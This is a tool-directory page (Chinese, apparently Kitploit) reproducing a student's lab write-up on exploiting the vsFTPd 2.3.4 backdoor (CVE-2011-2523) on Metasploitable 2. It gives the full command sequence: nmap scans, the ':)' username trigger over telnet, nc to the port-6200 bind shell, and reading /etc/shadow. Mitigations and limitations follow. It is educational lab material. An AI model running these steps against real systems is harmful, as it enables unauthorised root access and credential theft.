Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
metasploitable2-vsftpd-exploitation — 项目:在Metasploitable 2上利用vsFTPd 2.3.4后门漏洞(CVE-2011-2523) | Kitploit
工具/GitHubGitHub/rinaliyeva/metasploitable2-vsftpd-exploitation
密码破解权限提升侦察网络映射端口扫描漏洞分析漏洞利用后渗透利用渗透测试

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
学习与教育
GitHubrinaliyeva/metasploitable2-vsftpd-exploitation

metasploitable2-vsftpd-exploitation

项目:在Metasploitable 2上利用vsFTPd 2.3.4后门漏洞(CVE-2011-2523)

查看仓库
145个月前尚未审核

Metasploitable 2 - vsFTPd 2.3.4 漏洞利用实验室

概述

本项目演示了针对一个故意存在漏洞的机器 Metasploitable 2 的渗透测试工作流程。 目标在于识别、利用并分析 FTP 服务中的一个已知漏洞,最终实现 root 级别访问 并评估安全影响。


实验环境搭建

  • 攻击机: Ubuntu(虚拟机)
  • 目标机: Metasploitable 2(虚拟机)
  • 网络配置: 仅主机网络(192.168.56.0/24)

目标验证

验证了目标系统及其网络配置:

whoami
hostname
ifconfig

目标设置验证


连通性检查

确认了攻击机与目标机之间的网络连通性:

ping 192.168.56.101

Ping 连通性检查


目标

  • 执行网络侦察
  • 识别暴露的服务
  • 检测有漏洞的软件
  • 利用已知的后门漏洞
  • 获取 root 访问权限
  • 进行后渗透分析

使用工具

  • Nmap
  • Telnet
  • Netcat
  • Linux(Ubuntu 虚拟机)

攻击流程概要

  1. 验证目标配置和连通性
  2. 发现本地网络上的目标主机
  3. 识别开放端口和暴露的服务
  4. 检测到有漏洞的 FTP 服务(vsFTPd 2.3.4)
  5. 通过精心构造的 FTP 登录触发后门
  6. 通过绑定 shell 获得 root 访问权限
  7. 执行后渗透枚举

侦察

执行主机发现:

nmap -sn 192.168.56.0/24

识别出网络中的活动主机。

主机发现扫描


端口扫描

nmap 192.168.56.101

发现了多个开放端口,包括:

  • 21(FTP)
  • 22(SSH)
  • 23(Telnet)
  • 80(HTTP)
  • 445(SMB)

端口扫描结果


服务枚举

nmap -sV 192.168.56.101

识别出运行的 FTP 服务:

vsFTPd 2.3.4

完整的服务和脚本扫描结果包含在支持文件中:Nmap 扫描输出。

服务枚举


漏洞识别

FTP 服务运行着一个已知的漏洞版本:

vsFTPd 2.3.4

此版本的 vsFTPd 被分发时附带一个恶意后门,当认证过程中使用包含 :) 的用户名时触发。 激活后,该服务会在 6200 端口打开一个绑定 shell,允许未授权的远程访问。


利用(手动)

使用 Telnet 触发后门:

telnet 192.168.56.101 21
USER test:)
PASS test

通过 Telnet 触发后门


Shell 访问

使用 Netcat 连接到后门:

nc 192.168.56.101 6200

绑定 shell 连接


结果

whoami
root

成功获取 root 访问权限

Root 访问权限证明


后渗透

获取 root 访问权限后,执行了基本的系统枚举:

cat /etc/passwd
cat /etc/shadow
  • 枚举了系统用户和服务账户
  • 从 /etc/shadow 中检索了哈希凭据
  • 演示了对敏感系统文件的访问权限

用户枚举

Shadow 文件访问


影响

  • 完全系统受损(root 级别访问)
  • 能够执行任意命令
  • 敏感凭据数据泄露
  • 可能进行网络内的横向移动

缓解措施

  • 如果不需要则移除或禁用 FTP 服务
  • 将易受攻击的软件更新到安全版本
  • 用安全的替代方案(如 SFTP)替换不安全的协议(如未加密的 FTP)
  • 通过防火墙规则限制对关键服务的访问
  • 实施日志记录和监控
  • 强制实施强认证策略

支持文件

  • Nmap 扫描输出

关键要点

本实验展示了单个易受攻击的服务如何导致 完全系统受损。 这凸显了正确的服务配置、补丁管理以及最小化暴露攻击面的重要性。

我学到的内容

这是我第一次手动利用真实世界的后门。我了解到单个恶意的用户名字符串 (:)) 如何能够触发 root 级别的访问,这进一步强化了为什么服务枚举和版本检测在侦察中如此重要。我还更熟悉了基本的 Linux 后渗透命令,例如读取 /etc/shadow 以及理解哈希凭据的实际形式。

局限性

这是一个使用 Metasploitable 2(一台故意存在漏洞的机器)的受控实验环境。vsFTPd 2.3.4 后门是一个已知的 CVE(CVE-2011-2523),来自 2011 年,因此这并不反映现代的真实环境渗透。在真实的评估中,需要额外的步骤,如规避、日志绕过或横向移动。本项目侧重于理解核心利用机制,而非完整的渗透测试。

下载工具